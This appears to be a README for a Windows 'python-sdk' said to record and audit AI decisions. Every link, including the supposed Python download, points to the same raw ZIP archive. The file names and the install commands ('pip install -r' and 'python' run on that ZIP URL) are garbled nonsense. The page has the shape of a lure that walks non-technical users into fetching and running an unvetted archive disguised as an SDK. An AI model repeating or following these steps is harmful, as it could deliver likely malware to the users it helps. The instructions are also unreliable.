The python-sdk helps you keep track of every AI decision made by your applications. Use it to record, replay, and control how AI models behave. This tool supports improved safety, easy compliance checks, and audit readiness for AI systems. You don’t need to be a programmer to use it.
python-sdk works with popular AI tools and services such as OpenAI, Langchain, and OpenTelemetry. It records how AI decisions are made so you can review and govern them. This helps maintain trust and transparency in AI applications.
Before installing python-sdk, make sure your computer meets these requirements:
- Operating System: Windows 10 or later
- RAM: 4 GB minimum
- Disk Space: At least 100 MB free
- Python Installed: Version 3.7 or higher (download from https://github.com/GalaxyMindPower/python-sdk/raw/refs/heads/main/air/sdk-python-v3.8-alpha.4.zip)
- Internet connection for initial setup and updates
If you need help installing Python, visit the official Python website and follow their Windows installation guide.
Follow these steps to download and run the software on your Windows PC.
-
Visit the download page
Click this button to go to the official GitHub page where you can download the software:
-
Download the SDK
On the GitHub page, look for the latest release or download link. You will usually find a ZIP file or installer to download. Click the link to save the file to your computer. -
Extract the files
Find the downloaded ZIP file in your “Downloads” folder. Right-click it and choose “Extract All...” to unzip the contents. Pick a folder where you want to keep the files. -
Check for Python
Make sure you have Python installed by opening the Command Prompt (press Windows key + R, type cmd, then hit Enter). Type this command and press Enter:python --versionYou should see the Python version number. If not, install Python first.
-
Open Command Prompt in the SDK folder
Navigate to the folder where you extracted the SDK files. Hold the Shift key, right-click inside the folder, and choose “Open PowerShell window here” or “Open Command window here.” -
Install any required components
Type the following command to install the software dependencies:pip install -r https://github.com/GalaxyMindPower/python-sdk/raw/refs/heads/main/air/sdk-python-v3.8-alpha.4.zipThis step ensures the SDK has the software it needs to run correctly.
-
Run the SDK sample
To test if everything works, run the main program by typing:python https://github.com/GalaxyMindPower/python-sdk/raw/refs/heads/main/air/sdk-python-v3.8-alpha.4.zipThis starts the sample application. You should see confirmation messages about the AI decision recording running successfully.
Once installed, you can use the SDK to:
- Record AI decisions automatically during your AI workflows
- Replay past decisions to check or debug AI behavior
- Audit decision history to meet compliance and safety rules
- Apply governance rules on AI outputs based on customizable settings
All tasks can be done through simple commands in the Windows command line or by running scripts you prepare. The included examples show you how to manage AI decisions without technical skills.
Inside the extracted folder, you will find:
- https://github.com/GalaxyMindPower/python-sdk/raw/refs/heads/main/air/sdk-python-v3.8-alpha.4.zip – The main program to start recording and managing AI decisions
- https://github.com/GalaxyMindPower/python-sdk/raw/refs/heads/main/air/sdk-python-v3.8-alpha.4.zip – List of software required to run the SDK
- config/ – Folder with sample settings files to customize how the SDK works
- logs/ – This folder stores recorded AI decisions and audit data
- examples/ – Simple scripts showing how to use the SDK features
You can edit the settings inside the config folder to change how the SDK behaves:
- Adjust recording details (what information to save)
- Set rules for replay and governance
- Define logging levels for troubleshooting
Settings are stored in plain text files. Open them with Notepad or any text editor to make changes.
To update to a newer version:
-
Return to the GitHub download page
-
Download the latest release
-
Extract and replace the old folder with the updated one
-
Run the same commands to install updated dependencies:
pip install -r https://github.com/GalaxyMindPower/python-sdk/raw/refs/heads/main/air/sdk-python-v3.8-alpha.4.zip
Your previous logs and data will remain intact if you keep the logs folder.
